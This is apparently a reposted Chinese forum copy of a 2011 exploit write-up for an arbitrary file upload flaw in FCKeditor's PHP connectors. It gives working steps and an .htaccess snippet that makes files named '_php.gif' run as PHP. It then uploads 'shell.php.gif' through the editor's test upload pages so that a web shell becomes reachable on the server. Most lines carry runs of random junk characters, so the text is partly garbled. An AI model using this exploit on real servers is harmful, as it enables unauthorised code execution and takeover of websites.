FCKeditor所有php版本Upload上传漏洞
. k8 g, y$ `* E) Y8 M4 m* f, T0 i5 p作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
0 ^5 M; j' D; i7 ?- i- g减小字体 增大字体
! L/ E- _& t5 ]( \9 ?) Q0 K, F[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
( g" G2 q% m! _" K5 ?[+] Date: 2011
% F6 c) _9 G6 Z% f0 u& i/ u[+] Author : sinesafe.cn
8 g- ~# q: _; a+ G[+] Website : WwW.sinesafe.cn# X, `. `& o$ W0 I. M
———————————————————7 M8 a* A# q1 f: i" S. f6 g% A
1.create a htaccess file:
8 E4 m0 `" G2 G5 B2 {; e; tcode:% z( X) m1 Q9 W6 n
<FilesMatch “_php.gif”>
/ s3 L5 H4 x( ~SetHandler application/x-httpd-php
7 \2 L1 c5 o5 ]4 k/ J' J</FilesMatch>5 R$ R4 U" J4 U5 K* V
8 m; g% Y- I9 _6 h; ^
2.Now upload this htaccess with FCKeditor.
+ [" g+ ?2 s$ S
, [7 W, Q7 V; ]9 W4 t2 P- g1 c& chttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
: r9 B9 Q1 Z1 P7 m2 t
- y2 T3 s2 {4 M5 j& o4 c) g" l5 fhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html" Z7 U! T/ R& ]
# K. K$ o% P. ~# a
———————————————————————————————-
- K c1 J& Z' n( ]3.Now upload shell.php.gif with FCKeditor.+ c$ J0 c4 X/ N; a C; U- E
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.9 }6 [$ J3 m$ j M
5.http://www.sinesafe.cn/anything/shell_php.gif( @0 b; |0 U* m/ O3 }3 f
6.Now shell is available from server. |
# H" M" l: y( I
n$ f! X( N6 F1 n. w- E3 F
1 ?6 J* W. F# j( k1 K% N0 @! K7 g |
发表于 2013-10-27 17:25:21
收藏
分享
支持
反对